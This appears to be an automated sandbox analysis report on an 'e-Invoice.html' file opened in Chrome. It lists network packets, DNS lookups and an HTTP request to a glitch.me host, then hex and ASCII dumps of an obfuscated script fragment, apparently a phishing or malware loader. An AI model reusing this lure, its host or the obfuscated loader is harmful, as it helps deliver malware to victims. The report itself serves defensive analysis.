                            Jan 9, 2025 06:31:39.873327017 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.874206066 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.874218941 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.874278069 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.874284983 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.874319077 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.874957085 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.874970913 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.875024080 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.875030994 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.875071049 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.875844002 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.875860929 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.875919104 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.875926971 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.875962019 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.878221035 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.878259897 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.878312111 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.878376961 CET49733443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:39.878391027 CET4434973344.194.192.230192.168.2.4
                            Jan 9, 2025 06:31:39.883410931 CET49736443192.168.2.444.194.192.230
                            Jan 9, 2025 06:31:41.009025097 CET49675443192.168.2.4173.222.162.32
                            Jan 9, 2025 06:31:43.049191952 CET49740443192.168.2.4142.250.185.164
                            Jan 9, 2025 06:31:43.049241066 CET44349740142.250.185.164192.168.2.4
                            Jan 9, 2025 06:31:43.049335957 CET49740443192.168.2.4142.250.185.164
                            Jan 9, 2025 06:31:43.049527884 CET49740443192.168.2.4142.250.185.164
                            Jan 9, 2025 06:31:43.049542904 CET44349740142.250.185.164192.168.2.4
                            Jan 9, 2025 06:31:43.695633888 CET44349740142.250.185.164192.168.2.4
                            Jan 9, 2025 06:31:43.696651936 CET49740443192.168.2.4142.250.185.164
                            Jan 9, 2025 06:31:43.696671963 CET44349740142.250.185.164192.168.2.4
                            Jan 9, 2025 06:31:43.697655916 CET44349740142.250.185.164192.168.2.4
                            Jan 9, 2025 06:31:43.697715998 CET49740443192.168.2.4142.250.185.164
                            Jan 9, 2025 06:31:43.707820892 CET49740443192.168.2.4142.250.185.164
                            Jan 9, 2025 06:31:43.707892895 CET44349740142.250.185.164192.168.2.4
                            Jan 9, 2025 06:31:43.759331942 CET49740443192.168.2.4142.250.185.164
                            Jan 9, 2025 06:31:43.759340048 CET44349740142.250.185.164192.168.2.4
                            Jan 9, 2025 06:31:43.806206942 CET49740443192.168.2.4142.250.185.164
                            Jan 9, 2025 06:31:53.610635996 CET44349740142.250.185.164192.168.2.4
                            Jan 9, 2025 06:31:53.610706091 CET44349740142.250.185.164192.168.2.4
                            Jan 9, 2025 06:31:53.610752106 CET49740443192.168.2.4142.250.185.164
                            Jan 9, 2025 06:31:53.775973082 CET49740443192.168.2.4142.250.185.164
                            Jan 9, 2025 06:31:53.776000023 CET44349740142.250.185.164192.168.2.4
                            Jan 9, 2025 06:32:24.852298021 CET49736443192.168.2.444.194.192.230
                            Jan 9, 2025 06:32:24.852322102 CET4434973644.194.192.230192.168.2.4
                            Jan 9, 2025 06:32:41.057519913 CET49736443192.168.2.444.194.192.230
                            Jan 9, 2025 06:32:41.057599068 CET4434973644.194.192.230192.168.2.4
                            Jan 9, 2025 06:32:41.057651043 CET49736443192.168.2.444.194.192.230
                            Jan 9, 2025 06:32:43.103418112 CET49793443192.168.2.4142.250.185.164
                            Jan 9, 2025 06:32:43.103425980 CET44349793142.250.185.164192.168.2.4
                            Jan 9, 2025 06:32:43.103483915 CET49793443192.168.2.4142.250.185.164
                            Jan 9, 2025 06:32:43.103774071 CET49793443192.168.2.4142.250.185.164
                            Jan 9, 2025 06:32:43.103785992 CET44349793142.250.185.164192.168.2.4
                            Jan 9, 2025 06:32:43.738204956 CET44349793142.250.185.164192.168.2.4
                            Jan 9, 2025 06:32:43.738487005 CET49793443192.168.2.4142.250.185.164
                            Jan 9, 2025 06:32:43.738508940 CET44349793142.250.185.164192.168.2.4
                            Jan 9, 2025 06:32:43.738856077 CET44349793142.250.185.164192.168.2.4
                            Jan 9, 2025 06:32:43.739135027 CET49793443192.168.2.4142.250.185.164
                            Jan 9, 2025 06:32:43.743428946 CET44349793142.250.185.164192.168.2.4
                            Jan 9, 2025 06:32:43.790216923 CET49793443192.168.2.4142.250.185.164
                            Jan 9, 2025 06:32:53.651566982 CET44349793142.250.185.164192.168.2.4
                            Jan 9, 2025 06:32:53.651639938 CET44349793142.250.185.164192.168.2.4
                            Jan 9, 2025 06:32:53.651690006 CET49793443192.168.2.4142.250.185.164
                            Jan 9, 2025 06:32:55.058008909 CET49793443192.168.2.4142.250.185.164
                            Jan 9, 2025 06:32:55.058028936 CET44349793142.250.185.164192.168.2.4
                            TimestampSource PortDest PortSource IPDest IP
                            Jan 9, 2025 06:31:38.748261929 CET53627601.1.1.1192.168.2.4
                            Jan 9, 2025 06:31:38.748714924 CET53592851.1.1.1192.168.2.4
                            Jan 9, 2025 06:31:38.757215977 CET6118353192.168.2.41.1.1.1
                            Jan 9, 2025 06:31:38.758059025 CET6206553192.168.2.41.1.1.1
                            Jan 9, 2025 06:31:38.766782999 CET53620651.1.1.1192.168.2.4
                            Jan 9, 2025 06:31:38.767204046 CET53611831.1.1.1192.168.2.4
                            Jan 9, 2025 06:31:39.792093039 CET53620291.1.1.1192.168.2.4
                            Jan 9, 2025 06:31:43.041727066 CET6183853192.168.2.41.1.1.1
                            Jan 9, 2025 06:31:43.041841984 CET6170453192.168.2.41.1.1.1
                            Jan 9, 2025 06:31:43.048341036 CET53617041.1.1.1192.168.2.4
                            Jan 9, 2025 06:31:43.048408031 CET53618381.1.1.1192.168.2.4
                            Jan 9, 2025 06:31:50.969655037 CET53625871.1.1.1192.168.2.4
                            Jan 9, 2025 06:31:56.829992056 CET53614571.1.1.1192.168.2.4
                            Jan 9, 2025 06:32:00.451905966 CET138138192.168.2.4192.168.2.255
                            Jan 9, 2025 06:32:15.518179893 CET53643921.1.1.1192.168.2.4
                            Jan 9, 2025 06:32:38.080214024 CET53492971.1.1.1192.168.2.4
                            Jan 9, 2025 06:32:38.284173965 CET53575991.1.1.1192.168.2.4
                            Jan 9, 2025 06:33:08.391226053 CET53500321.1.1.1192.168.2.4
                            Jan 9, 2025 06:33:53.861025095 CET53495841.1.1.1192.168.2.4
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Jan 9, 2025 06:31:38.757215977 CET192.168.2.41.1.1.10xb98cStandard query (0)outstanding-tabby-collar.glitch.meA (IP address)IN (0x0001)false
                            Jan 9, 2025 06:31:38.758059025 CET192.168.2.41.1.1.10x8961Standard query (0)outstanding-tabby-collar.glitch.me65IN (0x0001)false
                            Jan 9, 2025 06:31:43.041727066 CET192.168.2.41.1.1.10x32b1Standard query (0)www.google.comA (IP address)IN (0x0001)false
                            Jan 9, 2025 06:31:43.041841984 CET192.168.2.41.1.1.10x31d5Standard query (0)www.google.com65IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jan 9, 2025 06:31:38.767204046 CET1.1.1.1192.168.2.40xb98cNo error (0)outstanding-tabby-collar.glitch.me44.194.192.230A (IP address)IN (0x0001)false
                            Jan 9, 2025 06:31:38.767204046 CET1.1.1.1192.168.2.40xb98cNo error (0)outstanding-tabby-collar.glitch.me18.215.21.8A (IP address)IN (0x0001)false
                            Jan 9, 2025 06:31:38.767204046 CET1.1.1.1192.168.2.40xb98cNo error (0)outstanding-tabby-collar.glitch.me44.206.124.177A (IP address)IN (0x0001)false
                            Jan 9, 2025 06:31:38.767204046 CET1.1.1.1192.168.2.40xb98cNo error (0)outstanding-tabby-collar.glitch.me34.231.178.252A (IP address)IN (0x0001)false
                            Jan 9, 2025 06:31:38.767204046 CET1.1.1.1192.168.2.40xb98cNo error (0)outstanding-tabby-collar.glitch.me54.205.162.115A (IP address)IN (0x0001)false
                            Jan 9, 2025 06:31:38.767204046 CET1.1.1.1192.168.2.40xb98cNo error (0)outstanding-tabby-collar.glitch.me34.233.109.53A (IP address)IN (0x0001)false
                            Jan 9, 2025 06:31:38.767204046 CET1.1.1.1192.168.2.40xb98cNo error (0)outstanding-tabby-collar.glitch.me54.82.142.83A (IP address)IN (0x0001)false
                            Jan 9, 2025 06:31:38.767204046 CET1.1.1.1192.168.2.40xb98cNo error (0)outstanding-tabby-collar.glitch.me44.216.103.126A (IP address)IN (0x0001)false
                            Jan 9, 2025 06:31:43.048341036 CET1.1.1.1192.168.2.40x31d5No error (0)www.google.com65IN (0x0001)false
                            Jan 9, 2025 06:31:43.048408031 CET1.1.1.1192.168.2.40x32b1No error (0)www.google.com142.250.185.164A (IP address)IN (0x0001)false
                            • outstanding-tabby-collar.glitch.me
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.44973344.194.192.2304431308C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-09 05:31:39 UTC661OUTGET / HTTP/1.1
                            Host: outstanding-tabby-collar.glitch.me
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-Dest: iframe
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-09 05:31:39 UTC508INHTTP/1.1 200 OK
                            Date: Thu, 09 Jan 2025 05:31:39 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 236406
                            Connection: close
                            x-amz-id-2: 39dSEJboq5uMppsth/6iH3Qvcsi/lb5W4Pd/ztEk9eiR7+cj1nNlkYXqRDIjNmZR2QMQCG5KlnA=
                            x-amz-request-id: 52PK76BF5PRNX693
                            last-modified: Thu, 09 Jan 2025 02:59:31 GMT
                            etag: "06f8c0556156886672604aa1376dbac6"
                            x-amz-server-side-encryption: AES256
                            cache-control: no-cache
                            x-amz-version-id: G5UdAbQud_pV5DnGgYCGoJKAfHWY4yVL
                            accept-ranges: bytes
                            server: AmazonS3
                            2025-01-09 05:31:39 UTC8441INData Raw: 3c 73 63 72 69 70 74 3e 0a 20 20 46 75 6e 63 74 69 6f 6e 28 0a 20 20 20 20 27 5c 27 66 32 26 6d 26 31 73 21 6c 38 25 2b 2e 35 66 7d 77 67 5f 26 2b 2b 2e 25 71 67 37 31 2e 2c 33 33 6d 2e 2b 5d 36 79 5e 2d 5d 25 67 21 65 66 33 5b 37 74 39 6e 77 5b 6c 5e 37 33 2d 2e 71 21 33 72 2a 7e 68 6b 6a 76 66 7d 65 65 6e 5e 74 5d 75 6b 23 6c 65 73 31 72 75 5e 76 69 7e 7b 40 74 5d 66 32 61 34 76 78 6e 71 66 25 2b 65 73 2a 70 5f 33 2d 36 2e 2b 5b 6f 23 75 67 69 71 69 6b 2d 77 23 40 65 6f 66 70 75 79 7b 35 65 6f 7d 32 38 6e 6e 5e 7b 31 78 6c 6b 68 6d 77 6c 72 32 34 65 39 6c 63 6a 21 72 68 25 34 73 77 6a 69 2d 5d 35 74 7b 6b 6f 39 63 65 31 7b 6c 70 76 76 67 38 6f 77 5b 66 70 7e 6d 74 5d 76 78 35 65 75 32 79 76 71 26 71 63 65 36 31 75 5b 21 5f 63 6c 73 38 65 7a 40 2c 61 72
                            Data Ascii: <script> Function( '\'f2&m&1s!l8%+.5f}wg_&++.%qg71.,33m.+]6y^-]%g!ef3[7t9nw[l^73-.q!3r*~hkjvf}een^t]uk#les1ru^vi~{@t]f2a4vxnqf%+es*p_3-6.+[o#ugiqik-w#@eofpuy{5eo}28nn^{1xlkhmwlr24e9lcj!rh%4swji-]5t{ko9ce1{lpvvg8ow[fp~mt]vx5eu2yvq&qce61u[!_cls8ez@,ar
                            2025-01-09 05:31:39 UTC7943INData Raw: 36 64 33 34 30 62 62 36 30 63 38 4f 31 62 35 31 37 38 38 58 44 36 38 39 43 33 37 61 62 31 66 37 59 46 35 31 30 64 38 44 34 35 37 63 34 33 31 39 58 55 62 37 38 65 35 35 32 2d 32 38 31 65 62 35 39 63 32 33 32 36 37 62 61 37 37 65 33 34 61 62 63 32 46 38 44 2e 37 33 64 37 39 66 63 36 39 44 36 34 33 62 30 31 44 65 37 65 31 34 65 64 31 33 65 61 62 31 38 38 35 46 32 36 64 31 34 38 32 65 61 35 38 38 30 34 38 34 34 63 37 33 34 61 31 3b 65 37 62 65 38 35 35 43 32 37 33 58 35 35 63 63 36 32 66 39 31 31 36 34 34 39 37 35 32 43 30 32 63 39 30 64 33 4f 66 39 32 46 46 36 63 64 39 34 36 62 33 37 64 37 37 58 34 36 37 44 34 34 31 41 58 31 59 38 38 52 33 62 35 31 32 38 65 46 38 36 32 43 46 46 44 39 36 63 61 39 32 38 65 31 31 37 65 65 62 35 38 63 35 33 32 39 46 3b 63 43 38
                            Data Ascii: 6d340bb60c8O1b51788XD689C37ab1f7YF510d8D457c4319XUb78e552-281eb59c23267ba77e34abc2F8D.73d79fc69D643b01De7e14ed13eab1885F26d1482ea58804844c734a1;e7be855C273X55cc62f9116449752C02c90d3Of92FF6cd946b37d77X467D441AX1Y88R3b5128eF862CFFD96ca928e117eeb58c5329F;cC8
                            2025-01-09 05:31:39 UTC8949INData Raw: 64 63 35 36 43 33 32 43 35 59 2a 65 37 39 58 41 34 33 63 31 32 31 35 35 63 34 36 39 44 31 21 59 62 30 31 38 35 31 4f 35 37 35 64 34 34 43 59 39 31 37 39 31 62 39 36 63 64 37 34 38 41 31 31 46 37 66 2c 32 35 61 44 30 33 63 61 66 64 35 37 59 58 33 35 63 63 35 33 35 41 46 64 64 33 32 43 33 35 39 63 35 33 38 35 31 64 66 38 32 44 44 35 38 63 31 32 43 39 31 59 39 33 59 39 33 32 32 62 66 31 59 39 35 66 38 37 34 39 30 31 36 41 58 32 34 39 30 49 33 32 39 65 30 33 62 61 63 31 37 38 35 66 65 33 31 39 38 3f 31 36 58 32 38 34 36 65 62 35 33 38 44 33 32 39 41 64 33 37 61 65 35 34 65 43 43 33 41 36 58 2d 33 37 33 65 31 35 37 63 37 32 37 61 61 66 66 37 38 58 34 35 37 62 35 32 59 39 58 64 31 32 36 63 64 34 34 37 59 66 30 35 41 62 34 37 63 39 61 33 66 61 37 65 31 38 36 58
                            Data Ascii: dc56C32C5Y*e79XA43c12155c469D1!Yb01851O575d44CY91791b96cd748A11F7f,25aD03cafd57YX35cc535AFdd32C359c53851df82DD58c12C91Y93Y9322bf1Y95f8749016AX2490I329e03bac1785fe3198?16X2846eb538D329Ad37ae54eCC3A6X-373e157c727aaff78X457b52Y9Xd126cd447Yf05Ab47c9a3fa7e186X
                            2025-01-09 05:31:39 UTC8949INData Raw: 32 34 38 62 34 32 37 34 44 66 33 35 62 64 34 33 44 41 44 32 37 35 35 41 41 33 62 64 31 33 64 62 30 43 39 35 37 66 61 35 35 44 30 33 39 61 34 4b 39 33 31 62 33 5b 59 39 41 33 37 39 33 28 44 37 30 65 63 53 38 38 65 32 36 39 63 23 38 37 62 61 31 35 38 59 33 32 34 38 66 66 64 37 36 61 39 31 30 37 39 65 36 61 30 62 65 36 33 43 59 7c 35 61 61 31 32 34 62 66 31 36 37 44 31 33 36 61 34 31 65 34 36 66 35 36 65 43 36 33 63 41 38 31 59 34 31 58 37 34 46 43 38 33 31 61 31 31 62 34 39 39 58 32 46 43 35 33 31 61 34 62 64 34 59 65 65 34 39 63 34 32 44 39 38 66 64 32 35 41 37 46 46 39 32 32 59 38 59 46 38 32 32 61 38 34 30 62 36 32 32 39 35 59 59 37 32 63 64 33 58 41 39 31 37 39 30 63 33 32 61 39 33 40 30 62 61 44 38 37 64 58 35 31 46 63 34 32 63 36 35 55 62 38 31 65 62
                            Data Ascii: 248b4274Df35bd43DAD2755AA3bd13db0C957fa55D039a4K931b3[Y9A3793(D70ecS88e269c#87ba158Y3248ffd76a91079e6a0be63CY|5aa124bf167D136a41e46f56eC63cA81Y41X74FC831a11b499X2FC531a4bd4Yee49c42D98fd25A7FF922Y8YF822a840b62295YY72cd3XA91790c32a93@0baD87dX51Fc42c65Ub81eb
                            2025-01-09 05:31:39 UTC16384INData Raw: 33 31 39 39 31 32 37 59 58 59 36 35 39 33 58 38 37 39 53 66 37 62 58 58 4c 37 39 35 33 38 39 33 2c 58 37 37 65 32 34 37 36 46 46 31 34 39 64 63 37 35 64 35 34 32 36 63 46 32 38 61 2d 30 36 43 44 46 3b 35 62 63 31 37 38 38 66 33 36 31 64 61 7c 64 37 34 44 44 34 61 2d 34 32 32 63 37 32 66 36 39 25 65 37 36 61 66 35 63 43 59 33 38 41 34 64 30 37 66 62 37 34 63 59 43 32 61 61 30 31 30 37 30 46 33 34 38 43 31 32 44 41 30 66 65 37 34 58 37 31 61 36 66 31 36 38 64 63 35 33 39 61 34 46 44 63 35 65 33 38 38 46 30 32 41 43 46 33 37 37 30 32 30 37 58 66 31 35 63 64 30 33 41 61 63 31 30 38 62 62 31 32 30 63 35 32 44 36 37 7c 63 37 34 41 44 35 46 62 66 33 35 41 36 4e 36 37 43 61 37 31 36 62 62 32 33 35 64 4b 32 36 61 41 33 35 36 43 34 31 65 38 44 3a 32 33 31 44 36 35
                            Data Ascii: 3199127YXY6593X879Sf7bXXL7953893,X77e2476FF149dc75d5426cF28a-06CDF;5bc1788f361da|d74DD4a-422c72f69%e76af5cCY38A4d07fb74cYC2aa01070F348C12DA0fe74X71a6f168dc539a4FDc5e388F02ACF3770207Xf15cd03Aac108bb120c52D67|c74AD5Fbf35A6N67Ca716bb235dK26aA356C41e8D:231D65
                            2025-01-09 05:31:39 UTC16384INData Raw: 33 32 41 34 28 36 38 35 66 32 31 39 38 62 2e 30 39 35 4d 35 37 33 65 39 35 39 59 39 33 63 39 31 49 41 37 36 58 39 34 37 62 64 33 30 36 33 59 38 35 46 64 36 29 66 37 66 58 39 34 36 52 65 32 63 44 31 33 39 37 33 31 38 38 30 62 39 36 31 44 35 34 38 62 32 31 34 38 36 65 38 36 37 64 34 46 59 36 58 65 32 37 37 58 37 35 35 63 62 33 59 39 59 31 65 37 33 58 43 35 38 63 62 32 39 39 46 31 32 34 35 39 61 34 31 59 38 46 31 36 31 63 63 32 38 66 30 5e 65 59 33 31 59 35 35 46 41 36 32 39 59 34 33 41 39 32 33 38 36 59 43 36 58 44 38 33 39 61 65 64 64 38 63 2d 35 35 64 64 33 33 66 59 32 64 38 37 65 58 36 35 66 43 38 33 38 59 32 65 30 33 35 63 36 35 63 63 38 33 62 35 34 58 32 38 35 58 30 35 59 63 34 32 66 39 34 59 43 33 58 39 36 32 39 43 32 32 32 38 46 62 39 33 46 44 37 34
                            Data Ascii: 32A4(685f2198b.095M573e959Y93c91IA76X947bd3063Y85Fd6)f7fX946Re2cD139731880b961D548b21486e867d4FY6Xe277X755cb3Y9Y1e73XC58cb299F12459a41Y8F161cc28f0^eY31Y55FA629Y43A92386YC6XD839aedd8c-55dd33fY2d87eX65fC838Y2e035c65cc83b54X285X05Yc42f94YC3X9629C2228Fb93FD74
                            2025-01-09 05:31:39 UTC11977INData Raw: 33 44 39 39 31 32 37 37 46 32 4d 63 62 66 32 37 36 30 31 33 37 44 65 33 35 35 63 66 46 31 35 33 31 36 33 35 58 43 34 37 62 31 32 37 39 32 53 41 33 30 65 34 34 46 41 59 32 35 39 37 66 37 36 44 44 44 34 35 37 46 32 34 38 65 4d 30 35 41 64 61 33 38 36 38 64 64 37 65 58 43 35 59 38 41 57 39 41 46 31 61 37 36 46 30 36 32 43 32 33 38 61 38 31 30 34 41 65 66 35 39 43 59 32 35 61 35 50 33 33 33 61 38 34 39 62 37 32 36 35 35 31 36 37 41 65 32 35 62 37 41 33 31 38 63 46 36 36 63 64 37 34 46 37 35 32 39 39 34 46 30 36 41 44 43 33 63 59 32 32 32 38 41 43 34 36 39 64 33 34 35 39 66 31 66 37 64 61 64 32 33 64 33 34 31 61 62 31 34 33 43 62 62 36 31 63 63 32 38 41 32 31 34 37 34 65 61 35 61 63 32 46 43 61 31 5e 62 37 64 64 37 35 37 59 35 65 35 35 62 3d 59 37 39 58 33 34
                            Data Ascii: 3D991277F2Mcbf2760137De355cfF1531635XC47b12792SA30e44FAY2597f76DDD457F248eM05Ada3868dd7eXC5Y8AW9AF1a76F062C238a8104Aef59CY25a5P333a849b72655167Ae25b7A318cF66cd74F752994F06ADC3cY2228AC469d3459f1f7dad23d341ab143Cbb61cc28A21474ea5ac2FCa1^b7dd757Y5e55b=Y79X34
                            2025-01-09 05:31:39 UTC4407INData Raw: 33 32 46 61 38 7d 66 38 31 59 41 34 46 62 66 32 44 41 33 31 33 37 33 46 36 34 62 63 34 33 30 61 33 3b 31 37 37 65 61 31 64 37 32 31 39 39 30 43 41 33 59 41 41 28 30 63 38 65 36 38 59 46 33 32 43 63 65 34 32 62 61 32 43 35 61 58 46 35 46 63 64 34 33 62 33 31 33 39 36 65 62 36 34 44 30 34 33 61 31 31 37 38 41 59 44 31 32 62 39 33 30 36 41 64 62 37 32 61 30 36 38 38 36 32 59 39 33 43 43 36 65 65 35 34 37 59 36 32 59 35 61 51 65 37 30 44 39 31 62 62 30 32 30 38 58 4f 34 37 34 44 34 35 37 61 63 32 35 39 31 48 34 36 32 64 38 34 59 37 65 64 33 37 61 66 31 32 41 39 43 33 37 36 31 32 39 34 37 65 63 35 34 38 44 32 46 61 36 52 38 37 37 58 43 35 30 43 30 33 41 61 37 31 59 34 39 44 58 34 65 59 43 33 32 41 32 4f 32 38 35 44 41 35 33 62 66 33 32 39 30 50 36 37 39 61 63
                            Data Ascii: 32Fa8}f81YA4Fbf2DA31373F64bc430a3;177ea1d721990CA3YAA(0c8e68YF32Cce42ba2C5aXF5Fcd43b31396eb64D043a1178AYD12b9306Adb72a068862Y93CC6ee547Y62Y5aQe70D91bb0208XO474D457ac2591H462d84Y7ed37af12A9C37612947ec548D2Fa6R877XC50C03Aa71Y49DX4eYC32A2O285DA53bf3290P679ac
                            2025-01-09 05:31:39 UTC16384INData Raw: 34 36 39 59 31 34 38 30 66 33 35 31 63 37 33 61 36 64 43 32 36 39 58 30 31 39 38 59 66 34 35 30 31 38 33 36 64 62 34 33 37 63 31 66 38 41 49 32 36 38 44 58 34 31 41 59 32 39 35 31 4f 38 36 33 64 30 34 33 37 66 31 34 38 34 46 32 36 38 44 38 33 38 59 59 31 30 38 39 46 35 36 38 63 36 33 43 41 46 65 32 33 37 64 65 35 35 39 33 55 31 36 61 43 35 38 64 41 59 35 30 62 38 46 31 39 34 66 66 37 38 64 64 35 37 62 33 66 39 38 65 66 65 36 63 58 32 35 32 59 32 33 35 38 41 3f 33 36 46 65 32 34 30 62 36 32 39 35 63 62 31 35 38 63 66 7c 36 37 36 65 30 33 66 4e 37 32 35 63 61 33 32 36 62 4d 58 37 39 46 32 35 37 64 31 32 64 36 36 31 38 37 38 46 34 35 46 63 39 5f 31 39 36 7b 36 37 34 58 41 35 41 59 41 33 64 39 32 56 62 37 37 58 41 34 38 62 65 33 31 36 34 62 39 36 30 44 37 57
                            Data Ascii: 469Y1480f351c73a6dC269X0198Yf4501836db437c1f8AI268DX41AY2951O863d0437f1484F268D838YY1089F568c63CAFe237de5593U16aC58dAY50b8F194ff78dd57b3f98efe6cX252Y2358A?36Fe240b6295cb158cf|676e03fN725ca326bMX79F257d12d661878F45Fc9_196{674XA5AYA3d92Vb77XA48be3164b960D7W
                            2025-01-09 05:31:39 UTC11977INData Raw: 33 61 61 61 53 41 38 44 65 32 35 62 63 37 33 41 39 38 4d 58 38 31 59 34 3f 39 62 30 32 37 35 66 64 32 36 63 39 37 35 66 37 64 32 32 38 61 63 33 36 37 65 32 34 36 61 63 31 39 38 36 66 64 36 33 39 38 34 62 59 36 32 37 38 30 66 65 35 58 41 30 33 35 41 35 31 33 38 39 46 39 35 39 64 63 33 31 41 41 31 36 38 39 65 37 35 64 44 30 4d 33 35 38 46 46 37 36 62 30 32 33 38 58 58 36 61 65 43 43 37 31 64 39 31 32 62 36 33 31 39 59 2a 39 36 38 58 32 35 38 38 37 31 43 38 63 66 61 37 30 65 30 34 30 63 33 31 38 39 31 66 64 37 30 43 58 34 34 59 37 58 41 33 66 65 36 35 64 39 35 2c 37 41 30 63 64 39 35 62 33 35 38 43 30 66 39 39 64 31 38 38 38 58 44 32 37 59 43 32 43 39 61 31 30 38 30 58 30 36 33 62 38 33 31 39 64 31 30 36 58 58 34 35 37 38 61 44 46 38 36 66 64 33 39 61 37 31
                            Data Ascii: 3aaaSA8De25bc73A98MX81Y4?9b0275fd26c975f7d228ac367e246ac1986fd63984bY62780fe5XA035A51389F959dc31AA1689e75dD0M358FF76b0238XX6aeCC71d912b6319Y*968X258871C8cfa70e040c31891fd70CX44Y7XA3fe65d95,7A0cd95b358C0f99d1888XD27YC2C9a1080X063b8319d106XX4578aDF86fd39a71


                            Click to jump to process

                            Click to jump to process

                            Click to jump to process

                            Target ID:0
                            Start time:00:31:35
                            Start date:09/01/2025
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\e-Invoice.html"
                            Imagebase:0x7ff76e190000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:2
                            Start time:00:31:37
                            Start date:09/01/2025
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1964,i,2849777622155410172,16645075551186467641,262144 /prefetch:8
                            Imagebase:0x7ff76e190000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            No disassembly